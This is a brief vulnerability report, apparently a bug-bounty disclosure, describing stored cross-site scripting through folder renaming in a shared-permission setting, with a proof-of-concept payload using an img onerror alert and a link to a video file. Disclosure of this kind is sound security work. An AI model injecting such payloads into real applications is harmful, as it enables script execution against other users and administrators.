If two users have same folder permission, malicious users can rename the folder with XSS payload, which will affect the other user, and admin.
Payload: "><img src=x onerror=alert(1)>
https://drive.google.com/file/d/1ukzcFocVAnd8WKEEo7-zE4iEMVLKUnXt/view